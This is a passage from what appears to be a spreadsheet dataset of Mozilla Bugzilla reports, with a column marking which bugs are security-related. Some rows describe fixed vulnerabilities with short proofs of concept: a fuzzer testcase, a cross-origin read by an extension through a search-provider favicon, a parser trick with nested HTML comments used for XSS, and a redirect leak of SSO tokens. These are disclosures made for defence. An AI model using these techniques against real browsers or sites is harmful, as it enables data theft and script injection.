        Line 622 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsThread.cpp"
    #13 0x7f45fa55c371 (libxul.so!NS_ProcessNextEvent(nsIThread*, bool)+0xb1)
        Line 251 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/glue/nsThreadUtils.cpp"
    #14 0x7f45f91a9091 (libxul.so!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*)+0x311)
        Line 85 of "/builds/slave/m-in-l64-asan-0000000000000000/build/ipc/glue/MessagePump.cpp"
    #15 0x7f45fa74b653 (libxul.so!MessageLoop::Run()+0x1c3)
        Line 220 of "/builds/slave/m-in-l64-asan-0000000000000000/build/ipc/chromium/src/base/message_loop.cc"
    #16 0x7f45f8f87cac (libxul.so!nsBaseAppShell::Run()+0x5c)
        Line 161 of "/builds/slave/m-in-l64-asan-0000000000000000/build/widget/xpwidgets/nsBaseAppShell.cpp"
    #17 0x7f45f8989d9e (libxul.so!nsAppStartup::Run()+0xbe)
        Line 268 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/components/startup/nsAppStartup.cpp"
    #18 0x7f45f5f131c5 (libxul.so!XREMain::XRE_mainRun()+0x1e05)
        Line 3886 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #19 0x7f45f5f140fa (libxul.so!XREMain::XRE_main(int, char**, nsXREAppData const*)+0x4fa)
        Line 3954 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #20 0x7f45f5f1502b (libxul.so!XRE_main+0x3ab)
        Line 4156 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #21 0x459d1d (firefox!main+0x94d)
        Line 275 of "/builds/slave/m-in-l64-asan-0000000000000000/build/browser/app/nsBrowserApp.cpp"
    #22 0x7f460568876c (libc.so.6!__libc_start_main+0xec)
        Line 226 of "libc-start.c"
    #23 0x45929c (firefox!_start+0x28)
==30229==ABORTING</t>
        </is>
      </c>
      <c r="X1027" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" t="n">
        <v>1064835</v>
      </c>
      <c r="B1028" t="inlineStr">
        <is>
          <t>2014-09-09 05:57:50 -0700</t>
        </is>
      </c>
      <c r="C1028" t="inlineStr">
        <is>
          <t>Assertion failure: stack_[*size_].isJs(), at vm/SPSProfiler.cpp:192 or Crash on Heap</t>
        </is>
      </c>
      <c r="D1028" t="inlineStr">
        <is>
          <t>2016-06-04 16:07:33 -0700</t>
        </is>
      </c>
      <c r="E1028" t="n">
        <v>1</v>
      </c>
      <c r="F1028" t="n">
        <v>1</v>
      </c>
      <c r="G1028" t="n">
        <v>3</v>
      </c>
      <c r="H1028" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1028" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1028" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1028" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1028" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1028" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1028" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1028" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1028" t="inlineStr">
        <is>
          <t>[adv-main34+]</t>
        </is>
      </c>
      <c r="Q1028" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1028" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1028" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T1028" t="n">
        <v>1</v>
      </c>
      <c r="U1028" t="n">
        <v>0</v>
      </c>
      <c r="V1028" t="n">
        <v>27</v>
      </c>
      <c r="W1028" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision 6b8da5940f74 (run with --no-threads --fuzzing-safe):
var lfcode = new Array();
lfcode.push("");
lfcode.push("");
lfcode.push("");
lfcode.push("x = function () { return arr.length; }");
lfcode.push("");
lfcode.push("");
lfcode.push("enableSPSProfiling();");
lfcode.push("");
lfcode.push("\
    x &gt;&gt;=  /x/;\
    (function f() {\
        x.r = x;\
        return f()\
    })();\
");
for (lfx in lfcode) { loadFile(lfcode[lfx]); }
function loadFile(lfVarx) {
    try {
        evaluate(lfVarx, { noScriptRval : true, compileAndGo : true }); 
    } catch (lfVare) {}
}</t>
        </is>
      </c>
      <c r="X1028" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" t="n">
        <v>1692623</v>
      </c>
      <c r="B1029" t="inlineStr">
        <is>
          <t>2021-02-12 16:08:22 -0800</t>
        </is>
      </c>
      <c r="C1029" t="inlineStr">
        <is>
          <t>Cross-origin read SOP violation by extension via search provider</t>
        </is>
      </c>
      <c r="D1029" t="inlineStr">
        <is>
          <t>2024-05-30 10:27:33 -0700</t>
        </is>
      </c>
      <c r="E1029" t="n">
        <v>1</v>
      </c>
      <c r="F1029" t="n">
        <v>1</v>
      </c>
      <c r="G1029" t="n">
        <v>2</v>
      </c>
      <c r="H1029" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1029" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1029" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K1029" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1029" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1029" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1029" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1029" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1029" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main87+]</t>
        </is>
      </c>
      <c r="Q1029" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1029" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1029" t="inlineStr">
        <is>
          <t>87 Branch</t>
        </is>
      </c>
      <c r="T1029" t="n">
        <v>1</v>
      </c>
      <c r="U1029" t="n">
        <v>0</v>
      </c>
      <c r="V1029" t="n">
        <v>16</v>
      </c>
      <c r="W1029" t="inlineStr">
        <is>
          <t>A malicious extension can read cross-origin resources by installing a specially crafted search provider and using the `browser.search` API.
This happens as the search engine manager fetches any absolute favicon URL, and converts the content to a `data:` URI which is made available to extension code, regardless of the resource's actual content type (e.g. text/html). 
### Proof of concept
- Create an extension which adds a search engine via the [`chrome_settings_overrides.search_provider`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/chrome_settings_overrides) manifest key. Set `favicon_url` to the web resource that should be read cross-origin. The target's content-type is irrelevant.
- Use [`browser.search.get()`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/search/get) to retrieve the installed search engine.
- Base64-decode the engine's `favIconUrl` `data:` URI payload.
### Analysis
The manifest format for the favicon URL, `relativeUrl`, permits absolute URLs. In [`parent/ext-search.js#34-41`](https://searchfox.org/mozilla-central/rev/bf03edd45ee0804f382c1f05ec88a05f5d88833c/browser/components/extensions/parent/ext-search.js#34-41), only extension-relative icons are converted to `data:` URIs (`engine.iconURI.schemeIs("moz-extension") &amp;&amp; engine.iconURI.host !== context.extension.uuid`). However, icon conversion is also done earlier in [`SearchEngine.jsm#766-813`](https://searchfox.org/mozilla-central/rev/bf03edd45ee0804f382c1f05ec88a05f5d88833c/toolkit/components/search/SearchEngine.jsm#766-813) without checking origin or content type. Hence, when `ext-search.js` queries the search service, the icons are already converted to `data:` URIs. 
### Security impact
The `search` permission does not show up in the addon details ("This extension doesn’t require any permissions.") or during installation, allowing an attack to go unnoticed. But while any http[s] URL can be targeted, cookies aren't transmitted. This makes the attack most useful against e.g. local interfaces/intranet resources, but doesn't allow an attacker to trivially tap the user's current web mail session.</t>
        </is>
      </c>
      <c r="X1029" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" t="n">
        <v>1389377</v>
      </c>
      <c r="B1030" t="inlineStr">
        <is>
          <t>2017-08-10 20:30:23 -0700</t>
        </is>
      </c>
      <c r="C1030" t="inlineStr">
        <is>
          <t>Make default in about:preferences should update default browser pane</t>
        </is>
      </c>
      <c r="D1030" t="inlineStr">
        <is>
          <t>2017-08-17 06:24:46 -0700</t>
        </is>
      </c>
      <c r="E1030" t="n">
        <v>1</v>
      </c>
      <c r="F1030" t="n">
        <v>1</v>
      </c>
      <c r="G1030" t="n">
        <v>2</v>
      </c>
      <c r="H1030" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1030" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1030" t="inlineStr">
        <is>
          <t>Settings UI</t>
        </is>
      </c>
      <c r="K1030" t="inlineStr">
        <is>
          <t>55 Branch</t>
        </is>
      </c>
      <c r="L1030" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1030" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1030" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1030" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1030" t="inlineStr">
        <is>
          <t>[photon-preference]</t>
        </is>
      </c>
      <c r="Q1030" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1030" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1030" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T1030" t="n">
        <v>1</v>
      </c>
      <c r="U1030" t="n">
        <v>0</v>
      </c>
      <c r="V1030" t="n">
        <v>23</v>
      </c>
      <c r="W1030" t="inlineStr">
        <is>
          <t>[Steps to reproduce]:
1. Open about:preferences (Make sure your default browser isn't Firefox)
2. Click "Make Default..." button in General &gt; Startup panel
3. Click "Use Firefox" in popup dialog (Assuming you're using macOS, but it depends on your OS)
[Expected result]:
- Messenge will be updated immediately to "Smile face" + "Firefox is currently your default browser" 
[Actual result]:
- Messenge stay in "Sad face" + "Firefox is not your default browser"</t>
        </is>
      </c>
      <c r="X1030" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" t="n">
        <v>1747388</v>
      </c>
      <c r="B1031" t="inlineStr">
        <is>
          <t>2021-12-23 04:44:55 -0800</t>
        </is>
      </c>
      <c r="C1031" t="inlineStr">
        <is>
          <t>Able to escape HTML comments by using a comment within a comment</t>
        </is>
      </c>
      <c r="D1031" t="inlineStr">
        <is>
          <t>2024-05-30 10:52:28 -0700</t>
        </is>
      </c>
      <c r="E1031" t="n">
        <v>1</v>
      </c>
      <c r="F1031" t="n">
        <v>1</v>
      </c>
      <c r="G1031" t="n">
        <v>3</v>
      </c>
      <c r="H1031" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1031" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1031" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K1031" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1031" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1031" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1031" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1031" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1031" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main101+]</t>
        </is>
      </c>
      <c r="Q1031" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1031" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1031" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T1031" t="n">
        <v>1</v>
      </c>
      <c r="U1031" t="n">
        <v>0</v>
      </c>
      <c r="V1031" t="n">
        <v>26</v>
      </c>
      <c r="W1031" t="inlineStr">
        <is>
          <t>I just used the following trick to fool a parser and got an XSS on a Bug Bounty-target. Firefox parsing differ from Chrome and Safari.
POC: https://playground.zulln.se/poc/firefox/commentwithincomment.html
Source code of POC:
```
Visible in all browsers.  &lt;!-- &lt;br&gt;Not visible in any browser &lt;!--k-&gt; &lt;br&gt;Visible in Firefox. --&gt; &lt;br&gt; Visible in all browsers.
```
The letter k within the comment in the middle of the poc can be any character.</t>
        </is>
      </c>
      <c r="X1031" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" t="n">
        <v>809449</v>
      </c>
      <c r="B1032" t="inlineStr">
        <is>
          <t>2012-11-07 08:12:36 -0800</t>
        </is>
      </c>
      <c r="C1032" t="inlineStr">
        <is>
          <t>Implement a way for jenkins to override the search index name used in tests</t>
        </is>
      </c>
      <c r="D1032" t="inlineStr">
        <is>
          <t>2013-01-29 15:11:15 -0800</t>
        </is>
      </c>
      <c r="E1032" t="n">
        <v>1</v>
      </c>
      <c r="F1032" t="n">
        <v>1</v>
      </c>
      <c r="G1032" t="n">
        <v>5</v>
      </c>
      <c r="H1032" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1032" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1032" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1032" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1032" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1032" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1032" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1032" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1032" t="inlineStr">
        <is>
          <t>u=dev c=infrastructure p=1 s=2013.2</t>
        </is>
      </c>
      <c r="Q1032" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1032" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1032" t="inlineStr">
        <is>
          <t>2013Q1</t>
        </is>
      </c>
      <c r="T1032" t="n">
        <v>1</v>
      </c>
      <c r="U1032" t="n">
        <v>0</v>
      </c>
      <c r="V1032" t="n">
        <v>8</v>
      </c>
      <c r="W1032" t="inlineStr">
        <is>
          <t>Right now the search index name is for testing is set in settings_test.py:
    ES_INDEXES = {'default': 'sumo_test'}
    ES_WRITE_INDEXES = ES_INDEXES
The problem is that if you have more than one kitsune suite in jenkins, they will fight each other for this index. We need a way to either make this value dynamic or configurable.</t>
        </is>
      </c>
      <c r="X1032" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" t="n">
        <v>273767</v>
      </c>
      <c r="B1033" t="inlineStr">
        <is>
          <t>2004-12-08 11:48:00 -0800</t>
        </is>
      </c>
      <c r="C1033" t="inlineStr">
        <is>
          <t>Cannot log out when param(shutdownhtml) is active</t>
        </is>
      </c>
      <c r="D1033" t="inlineStr">
        <is>
          <t>2005-07-27 13:06:15 -0700</t>
        </is>
      </c>
      <c r="E1033" t="n">
        <v>1</v>
      </c>
      <c r="F1033" t="n">
        <v>1</v>
      </c>
      <c r="G1033" t="n">
        <v>4</v>
      </c>
      <c r="H1033" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1033" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1033" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K1033" t="inlineStr">
        <is>
          <t>2.17.6</t>
        </is>
      </c>
      <c r="L1033" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1033" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1033" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1033" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1033" t="inlineStr">
        <is>
          <t>[wanted for 2.20]</t>
        </is>
      </c>
      <c r="Q1033" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1033" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1033" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T1033" t="n">
        <v>1</v>
      </c>
      <c r="U1033" t="n">
        <v>0</v>
      </c>
      <c r="V1033" t="n">
        <v>24</v>
      </c>
      <c r="W1033" t="inlineStr">
        <is>
          <t>When something is entered in the 'shutdownhtml' parameter, every page except 
editparams.cgi is disabled... including the logout page. If one goes to log 
out, one sees the information entered in the 'shutdownhtml' param, and the 
footer indicates that the user has to 'log in'... but this is misleading, as 
the user is actually still logged in. As soon as the 'shutdownhtml' text is 
removed, anyone using that session will have access to that user's account 
because they literally cannot log out.
If 'shutdownhtml' is active, and the user moves to another page, user should be 
told to log out (and allowed to do so) or logged out automatically. Implying 
that they have already been logged out (by displaying the 'Log In' link in the 
footer) is deceptive, and a potential breach of security.</t>
        </is>
      </c>
      <c r="X1033" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" t="n">
        <v>1777588</v>
      </c>
      <c r="B1034" t="inlineStr">
        <is>
          <t>2022-06-30 12:58:28 -0700</t>
        </is>
      </c>
      <c r="C1034" t="inlineStr">
        <is>
          <t>Crash in [@ nsTArray_Impl&lt;T&gt;::~nsTArray_Impl | nsUrlClassifierPrefixSet::~nsUrlClassifierPrefixSet]</t>
        </is>
      </c>
      <c r="D1034" t="inlineStr">
        <is>
          <t>2024-09-16 00:07:08 -0700</t>
        </is>
      </c>
      <c r="E1034" t="n">
        <v>1</v>
      </c>
      <c r="F1034" t="n">
        <v>1</v>
      </c>
      <c r="G1034" t="n">
        <v>3</v>
      </c>
      <c r="H1034" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1034" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1034" t="inlineStr">
        <is>
          <t>Safe Browsing</t>
        </is>
      </c>
      <c r="K1034" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1034" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1034" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1034" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1034" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1034" t="inlineStr">
        <is>
          <t>[adv-esr102.10+r]</t>
        </is>
      </c>
      <c r="Q1034" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1034" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1034" t="inlineStr">
        <is>
          <t>106 Branch</t>
        </is>
      </c>
      <c r="T1034" t="n">
        <v>1</v>
      </c>
      <c r="U1034" t="n">
        <v>0</v>
      </c>
      <c r="V1034" t="n">
        <v>18</v>
      </c>
      <c r="W1034" t="inlineStr">
        <is>
          <t>Crash report: https://crash-stats.mozilla.org/report/index/b24d3d80-faa9-41ef-ae83-1b9f90220630
Reason: ```EXCEPTION_ACCESS_VIOLATION_READ```
Top 10 frames of crashing thread:
```
0 xul.dll nsTArray_Impl&lt;DXGI_OUTPUT_DESC1, nsTArrayInfallibleAllocator&gt;::~nsTArray_Impl xpcom/ds/nsTArray.h:1030
1 xul.dll nsUrlClassifierPrefixSet::~nsUrlClassifierPrefixSet toolkit/components/url-classifier/nsUrlClassifierPrefixSet.cpp:39
2 xul.dll nsUrlClassifierPrefixSet::Release toolkit/components/url-classifier/nsUrlClassifierPrefixSet.cpp:27
3 xul.dll mozilla::safebrowsing::VariableLengthPrefixSet::Release toolkit/components/url-classifier/VariableLengthPrefixSet.cpp:41
4 xul.dll mozilla::safebrowsing::LookupCacheV2::~LookupCacheV2 toolkit/components/url-classifier/LookupCache.h:332
5 xul.dll nsTArray_Impl&lt;RefPtr&lt;mozilla::safebrowsing::LookupCache&gt;, nsTArrayInfallibleAllocator&gt;::Clear xpcom/ds/nsTArray.h:1934
6 xul.dll mozilla::safebrowsing::Classifier::RemoveUpdateIntermediaries toolkit/components/url-classifier/Classifier.cpp:594
7 xul.dll mozilla::safebrowsing::Classifier::SwapInNewTablesAndCleanup toolkit/components/url-classifier/Classifier.cpp:689
8 xul.dll mozilla::detail::RunnableFunction&lt;`lambda at /builds/worker/checkouts/gecko/toolkit/components/url-classifier/Classifier.cpp:772:13'&gt;::Run xpcom/threads/nsThreadUtils.h:531
9 xul.dll nsThread::ProcessNextEvent xpcom/threads/nsThread.cpp:1174
```
Putting this in the networking component but I'm not sure if it's the right one, so feel free to move it where appropriate.
This bug is bad news. It seems that we're accessing a dead object when destroying a nsUrlClassifierPrefixSet instance. Crashes appear to be either use-after-free accesses, double-frees or wild pointer accesses, presumably because the memory we pointed to was already allocated to another object.
I don't know what's the purpose of this code but given it has URL in the name and it's happening in the main process I guess this might be *very dangerous* if an attacker can trigger it somehow.</t>
        </is>
      </c>
      <c r="X1034" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" t="n">
        <v>1602449</v>
      </c>
      <c r="B1035" t="inlineStr">
        <is>
          <t>2019-12-09 06:12:54 -0800</t>
        </is>
      </c>
      <c r="C1035" t="inlineStr">
        <is>
          <t>Split MozPhab into a set of modules</t>
        </is>
      </c>
      <c r="D1035" t="inlineStr">
        <is>
          <t>2022-10-27 10:18:23 -0700</t>
        </is>
      </c>
      <c r="E1035" t="n">
        <v>1</v>
      </c>
      <c r="F1035" t="n">
        <v>1</v>
      </c>
      <c r="G1035" t="n">
        <v>7</v>
      </c>
      <c r="H1035" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1035" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J1035" t="inlineStr">
        <is>
          <t>moz-phab</t>
        </is>
      </c>
      <c r="K1035" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1035" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1035" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1035" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1035" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1035" t="inlineStr"/>
      <c r="Q1035" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1035" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1035" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1035" t="n">
        <v>1</v>
      </c>
      <c r="U1035" t="n">
        <v>0</v>
      </c>
      <c r="V1035" t="n">
        <v>7</v>
      </c>
      <c r="W1035" t="inlineStr">
        <is>
          <t>`moz-phab` is a very large file for a Python script.
We should refactor it into multiple modules.</t>
        </is>
      </c>
      <c r="X1035" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" t="n">
        <v>831978</v>
      </c>
      <c r="B1036" t="inlineStr">
        <is>
          <t>2013-01-17 12:49:53 -0800</t>
        </is>
      </c>
      <c r="C1036" t="inlineStr">
        <is>
          <t>Story - Make Sync Setup Happen in a Flyout</t>
        </is>
      </c>
      <c r="D1036" t="inlineStr">
        <is>
          <t>2019-01-02 07:21:12 -0800</t>
        </is>
      </c>
      <c r="E1036" t="n">
        <v>1</v>
      </c>
      <c r="F1036" t="n">
        <v>1</v>
      </c>
      <c r="G1036" t="n">
        <v>6</v>
      </c>
      <c r="H1036" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1036" t="inlineStr">
        <is>
          <t>Tracking Graveyard</t>
        </is>
      </c>
      <c r="J1036" t="inlineStr">
        <is>
          <t>Metro Operations</t>
        </is>
      </c>
      <c r="K1036" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1036" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1036" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N1036" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1036" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1036" t="inlineStr">
        <is>
          <t>feature=story c=Content_features u=metro_firefox_user p=8</t>
        </is>
      </c>
      <c r="Q1036" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1036" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1036" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1036" t="n">
        <v>1</v>
      </c>
      <c r="U1036" t="n">
        <v>0</v>
      </c>
      <c r="V1036" t="n">
        <v>3</v>
      </c>
      <c r="W1036" t="inlineStr">
        <is>
          <t>Created attachment 703546
UC-142 	 Metro-style content alerts and prompts</t>
        </is>
      </c>
      <c r="X1036" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" t="n">
        <v>397427</v>
      </c>
      <c r="B1037" t="inlineStr">
        <is>
          <t>2007-09-24 17:44:03 -0700</t>
        </is>
      </c>
      <c r="C1037" t="inlineStr">
        <is>
          <t>[FIX]Stylesheet href property shows redirected URL unlike other browsers</t>
        </is>
      </c>
      <c r="D1037" t="inlineStr">
        <is>
          <t>2010-02-23 12:53:44 -0800</t>
        </is>
      </c>
      <c r="E1037" t="n">
        <v>1</v>
      </c>
      <c r="F1037" t="n">
        <v>1</v>
      </c>
      <c r="G1037" t="n">
        <v>3</v>
      </c>
      <c r="H1037" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1037" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1037" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K1037" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1037" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1037" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1037" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1037" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1037" t="inlineStr">
        <is>
          <t>[sg:low?] severity depends on website [dbaron-1.9:RsCe]</t>
        </is>
      </c>
      <c r="Q1037" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1037" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1037" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1037" t="n">
        <v>1</v>
      </c>
      <c r="U1037" t="n">
        <v>0</v>
      </c>
      <c r="V1037" t="n">
        <v>40</v>
      </c>
      <c r="W1037" t="inlineStr">
        <is>
          <t>Created attachment 282197
Simple testcase
Received the following via mail:
--------------------------------
The issue is that Firefox will follow 302 redirects on &lt;LINK
REL="stylesheet" HREF="..."&gt; requests, *and* then allow the target URL
to be read by accessing element.sheet.href property.
This sounds like a non-issue, but has profound implications for a
number of contemporary websites, most notably:
1) Many webpages use SSO mechanisms and pass temporary authentication
tokens in URLs to set cookies for the target domain, then safely
consume the token. By pointing an already authenticated user to
'sso.example.com/auth?cont=fun.example.com' and reading back
'fun.example.com/auth_ok?secret_token' target URL, user accounts can
be compromised on a large number of high-profile sites.
2) Many webpages redirect an already authenticated user from main page
(fun.example.com) by appending URL information that may temporarily
contain sensitive data, such as session IDs, mailbox names, user
names, and the like
(fun.example.com/home/john.doe/hot_movies;jsessionid=foo). These would
be disclosed to third parties, severely violating user's privacy,
especially if done at a large scale.
Because the problem affects a number of sites and is hard to fix on
server side, we would prefer not to have to explicitly explain these
attack scenarios in a Bugzilla entry (and without that additional
explanation, the impact is not very obvious).
(We have no problem with the existence of a fix being communicated to
users once it is available, naturally; Martin Straka should be
credited as the original reporter if you wish to do so).
----------------------------------------------------
The above did not come with a PoC, but the attached file shows the difference between the link href and the sheet href. Mozilla.com's support page isn't a real stylesheet, but it's a handy redirected page.</t>
        </is>
      </c>
      <c r="X1037" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" t="n">
        <v>530832</v>
      </c>
      <c r="B1038" t="inlineStr">
        <is>
          <t>2009-11-24 09:44:36 -0800</t>
        </is>
      </c>
      <c r="C1038" t="inlineStr">
        <is>
          <t>change layout for Merge/wipe/wipe screen in sign-in</t>
        </is>
      </c>
      <c r="D1038" t="inlineStr">
        <is>
